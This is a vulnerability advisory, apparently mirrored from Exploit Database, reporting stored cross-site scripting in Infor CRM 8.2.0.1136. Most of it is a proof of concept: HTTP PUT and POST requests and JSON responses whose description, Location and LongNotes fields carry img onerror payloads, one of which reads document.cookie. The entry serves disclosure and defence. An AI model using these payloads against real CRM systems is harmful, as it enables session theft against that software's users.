Infor CRM 8.2.0.1136 – Multiple HTML Script Injection Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2016-02-26
• 类别：

  • webapps
  平台：

  • ashx
• 来源：https://www.exploit-db.com/exploits/39497/

• 
  Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
  
  
  Vendor: Infor
  Product web page: http://www.infor.com
  Affected version: 8.2.0.1136
  
  
  Summary: Infor® CRM, formerly Saleslogix, is an award-winning
  customer relationship management (CRM) solution that provides
  a complete view of customer interactions, so your business can
  collaborate and respond promptly and knowledgably to customer
  inquiries, sales opportunities, and service requests. Infor CRM
  includes a robust suite of sales, marketing, and service capabilities,
  to offer businesses of all sizes a fast, flexible, and affordable
  solution for finding, winning, and growing profitable customer
  relationships.
  
  Desc: Infor CRM suffers from multiple stored cross-site scripting
  vulnerabilities. Input passed to several POST/PUT parameters in
  JSON format is not properly sanitised before being returned to the
  user. This can be exploited to execute arbitrary HTML and script
  code in a user's browser session in context of an affected site.
  
  Tested on: Microsoft-IIS/8.5
   ASP.NET/4.0.30319
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5308
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
  
  
  21.01.2016
  
  ---
  
  
  ----------------------------------
  Affected parameter(s): description
  ----------------------------------
  
  PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
  Host: intranet.zeroscience.mk
  
  
  {$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
  "": ""
  $descriptor: ""
  $etag: "+CgjMLB+0nA="
  $httpStatus: 200
  $key: "eUSERA0004IX"
  $lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
  $post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
  $schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
  $service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
  $template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
  $updated: "/Date(1456359095000)/"
  $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
  accountId: null
  activityId: null
  attachDate: "2016-01-25T00:09:39Z"
  contactId: null
  contractId: null
  createDate: "/Date(1456359095000)/"
  createUser: "UUSERA0005W0"
  dataType: "R"
  defectId: null
  description: "<img src=j onerror=confirm(document.cookie) >"
  details: {createSource: null}
  documentType: null
  fileExists: true
  fileName: "inforcrm_xss.png"
  fileSize: 101722
  historyId: null
  leadId: null
  modifyDate: "/Date(1456359095000)/"
  modifyUser: "UUSERA0005W0"
  opportunityId: null
  physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
  productId: null
  remoteStatus: null
  returnId: null
  salesOrderId: null
  ticketId: null
  url: null
  user: {$key: "UUSERA0005W0"}
  
  
  
  -----------------------------------------------------------
  Affected parameter(s): Description, Location, and LongNotes
  -----------------------------------------------------------
  
  POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
  Host: intranet.zeroscience.mk
  
  
  {$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
  $descriptor: ""
  $httpStatus: 200
  AccountId: null
  AccountName: null
  ActivityAttendees: {}
  ActivityBasedOn: null
  Alarm: false
  AlarmTime: "2016-01-24T22:45:00Z"
  AllowAdd: true
  AllowComplete: true
  AllowDelete: true
  AllowEdit: true
  AllowSync: true
  AppId: null
  Attachment: false
  AttachmentCount: null
  AttendeeCount: 0
  Category: "Pleasantville"
  ContactId: null
  ContactName: null
  CreateDate: "/Date(-62135596800000)/"
  CreateUser: null
  Description: "<img src=zsl onerror=prompt(1) >"
  Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
  ChangeKey: null
  CreateSource: null
  ForeignId1: null
  ForeignId2: null
  ForeignId3: null
  ForeignId4: null
  GlobalSyncId: null
  ProjectId: null
  Tick: null
  UserDef1: null
  UserDef2: null
  UserDef3: null
  Duration: "0"
  EndDate: "/Date(1456359315286)/"
  LeadId: null
  LeadName: null
  Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
  $descriptor: "Userovich, User"
  $key: "UUSERA0005W0"
  Location: "<img src=zsl onerror=prompt(2) >"
  LongNotes: "<img src=zsl onerror=prompt(3) >"
  ModifyDate: "/Date(-62135596800000)/"
  ModifyUser: null
  Notes: "Zero Science Lab"
  OpportunityId: null
  OpportunityName: null
  OriginalDate: "/Date(1456358415286)/"
  PhoneNumber: null
  Priority: "1"
  ProcessId: null
  ProcessNode: null
  RecurIterations: 0
  RecurPeriod: 0
  RecurPeriodSpec: 0
  RecurSkip: null
  RecurrenceState: "rsNotRecurring"
  Recurring: false
  Resources: {}
  Rollover: false
  StartDate: "2016-01-25T00:00:05Z"
  TicketId: null
  TicketNumber: null
  Timeless: true
  Type: "atToDo"
  UserActivities: {}
  $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
  UserNotifications: {}
  $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"